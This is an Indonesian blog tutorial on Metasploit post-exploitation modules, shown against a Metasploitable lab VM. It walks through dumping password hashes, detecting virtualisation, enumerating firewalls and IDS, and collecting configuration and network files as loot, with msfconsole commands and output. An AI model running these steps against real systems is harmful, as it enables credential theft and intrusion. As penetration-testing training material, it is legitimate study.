Search here and hit enter....

Cara Cepat Mengumpulkan Informasi Target Dengan Modul Pos Metasploit

advertise here
cara-cepat-mengumpulkan-informasi-target-dengan-modul-pos-metasploit

Pengumpulan informasi pasca eksploitasi dapat menjadi proses yang panjang dan berlarut-larut, tetapi ini merupakan langkah penting ketika mencoba untuk pivot atau establish advanced persistence. Setiap hacker harus tahu bagaimana cara menghitung target secara manual, tetapi kadang-kadang layak untuk mengotomatiskan proses. Metasploit berisi modul pos yang dapat dengan cepat mengumpulkan informasi berharga tentang target, menghemat waktu dan tenaga.


Untuk menggunakan modul post, kita harus menjalankan sesi Meterpreter. Modul-modul ini akan berjalan sebagai pengguna mana pun sampai batas tertentu, tetapi memiliki akses tingkat root sangat ideal karena memungkinkan kita akses tidak terbatas ke sistem.


Modul 1: Hashdump

Untuk memulai, dari prompt utama di Metasploit. Perintah sesi untuk menampilkan sesi saat ini berjalan di latar belakang:


msf5 > sessions 
msf5 > use post/linux/gather/ 
>use post/linux/gather/enum_psk 
>use post/linux/gather/enum_system 
>use post/linux/gather/hashdump 
>use post/linux/gather/tor_hiddenservices 
>use post/linux/gather/enum_configs 
msf5 > use post/linux/gather/hashdump 
msf5 post(linux/gather/hashdump) > options 
msf5 post(linux/gather/hashdump) > set session 3
msf5 post(linux/gather/hashdump) > run


Kita dapat melihat hash untuk semua pengguna di sistem sekarang, dan itu bahkan menulis informasi ini ke file untuk kita.


Modul 2: Checkvm

Modul checkvm, ini akan berusaha untuk menentukan apakah targetnya adalah mesin virtual atau tidak, yang dapat menjadi informasi berguna untuk eksploit atau vektor serangan tertentu.

msf5 post(linux/gather/hashdump) > use post/linux/gather/checkvm 
msf5 post(linux/gather/checkvm) > options 
msf5 post(linux/gather/checkvm) > set session 3 
msf5 post(linux/gather/checkvm) > run 
[*] Gathering System info .... 
[+] This appears to be a 'VirtualBox' virtual machine 
[*] Post module execution completed


Kita dapat melihat bahwa itu menentukan target tampaknya menjadi mesin virtual VirtualBox.


Modul 3: enum_protections

Yang selanjutnya adalah modul enum_protections; ini mencoba menemukan program tertentu pada target yang dapat digunakan untuk mendeteksi serangan, seperti antivirus, firewall, IDS / IPS, perangkat lunak jaringan sniffing, dan lainnya.

msf5 post(linux/gather/checkvm) > use post/linux/gather/enum_protections 
msf5 post(linux/gather/enum_protections) > options 
msf5 post(linux/gather/enum_protections) > run 
[*] Running module against 10.10.0.50 [metasploitable] 
[*] Info: 
[*] _ _ _ _ _ _ ____ _ __ ___ ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \ | '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) || | | | | | __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | | __// __/ |_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____| |_| Warning: Never expose this VM to an untrusted network!Contact: msfdev@metasploit.comLogin with msfadmin/msfadmin to get started 
[*] Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux 
[*] Finding system protections... 
[+] ASLR is enabled 
[*] Finding installed applications... 
[+] ufw found: /usr/sbin/ufw 
[+] iptables found: /sbin/iptables 
[+] logrotate found: /usr/sbin/logrotate 
[+] tcpdump found: /usr/sbin/tcpdump 
[+] aa-status found: /usr/sbin/aa-status 
[*] Post module execution completed


Kita dapat melihat sepertinya menemukan beberapa perangkat lunak firewall, tcpdump, dan ASLR diaktifkan; informasi semacam ini bisa sangat berharga ketika menyiapkan serangan.


Modul 4: enum_configs
msf5 post(linux/gather/enum_protections) > use post/linux/gather/enum_configs 
msf5 post(linux/gather/enum_configs) > run


Seperti konfigurasi Apache, sysctl, seseorang, dan lain-lain. Itu juga menyimpan masing-masing file yang ditemukan di direktori untuk digunakan nanti. Sebagai contoh, kita dapat melihat konfigurasi Apache dengan menghapus path lengkap file:

msf5 post(linux/gather/enum_configs) > cat /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_509051.txt


Modul 5:
enum_network

Modul enum_network; ini akan mengumpulkan informasi terkait jaringan pada target, seperti alamat IP, rute, port terbuka, konfigurasi SSH, dan informasi DNS.

msf5 post(linux/gather/enum_configs) > use post/linux/gather/enum_network msf5 post(linux/gather/enum_network) > run


Kita bisa melihat pengumpulan informasi jaringan yang besar, semuanya dapat berguna bagi penyerang. Sebagai contoh, kita dapat melihat file konfigurasi jaringan:


msf5 post(linux/gather/enum_network) > cat /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_661472.txt


Modul 6: enum_system

modul enum_system; ini akan mengumpulkan informasi sistem tentang target, termasuk versi Linux, paket yang diinstal, menjalankan layanan, pekerjaan cron, dan akun pengguna. Sekali lagi, ini semua hal yang dapat ditemukan secara manual, tetapi terkadang lebih masuk akal untuk melakukannya untuk Anda semua sekaligus.

msf5 post(linux/gather/enum_network) > use post/linux/gather/enum_system 
msf5 post(linux/gather/enum_system) > run 
msf5 post(linux/gather/enum_system) > cat /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_739938.txt


Penjelasan Akhir (Kata Kunci)

kita telah menjelajahi beberapa modul pos Metasploit untuk mengumpulkan informasi berharga tentang target. Kita membahas modul untuk memeriksa perlindungan apa yang ada dan apakah sistem itu VM atau tidak, modul untuk menemukan informasi konfigurasi yang berkaitan dengan jaringan dan perangkat lunak umum, dan bahkan modul untuk membuang hash kata sandi. 


Meskipun semua informasi ini dapat dikumpulkan secara manual, Metasploit membuat pekerjaan menjadi cepat dan tidak menyakitkan.

Advertisement text_describe_your_image
BERIKAN KOMENTAR ()